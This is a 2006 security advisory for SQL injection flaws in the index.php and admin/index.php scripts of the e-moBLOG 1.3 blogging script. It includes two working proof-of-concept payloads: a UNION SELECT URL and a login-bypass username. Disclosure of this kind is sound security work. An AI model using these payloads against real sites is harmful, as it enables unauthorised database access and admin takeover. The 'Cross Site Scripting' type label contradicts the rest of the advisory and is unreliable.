SQL Injection Vulnerability in e-moBLOG

Summary

Vulnerability
SQL Injection Vulnerability in e-moBLOG
Discovered
2006.01.20
Last Update
0 n/a
ID
EV0043
CVE
CVE-2006-0403
Risk Level
medium
Type
Cross Site Scripting
Status
Unpatched
Vendor
n/a
Vulnerable Software
e-moBLOG (http://www.e-motionalis.net/)
Version
1.3
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Cross Site Scripting found in e-moBLOG (http://www.e-motionalis.net/) script.

Vulnerable script: index.php
Variable $monthy isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Vulnerable script: admin/index.php
Variable $login isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc - off


PoC/Exploit

1. SQL Inection Example

http://host/emoblog/index.php?monthy=2006017'%20union%20select%201,2,3,4,5,6,7,8,9,10/*#1

2. SQL Inection Example

link: http://host/emoblog/admin/index.php
username: aaa' union select 'bbb','[md5-hash of anypass]'/*
password: [anypass]

Solution.

Solution for "SQL Injection Vulnerability in e-moBLOG" is not available. Check vendor's website for updates.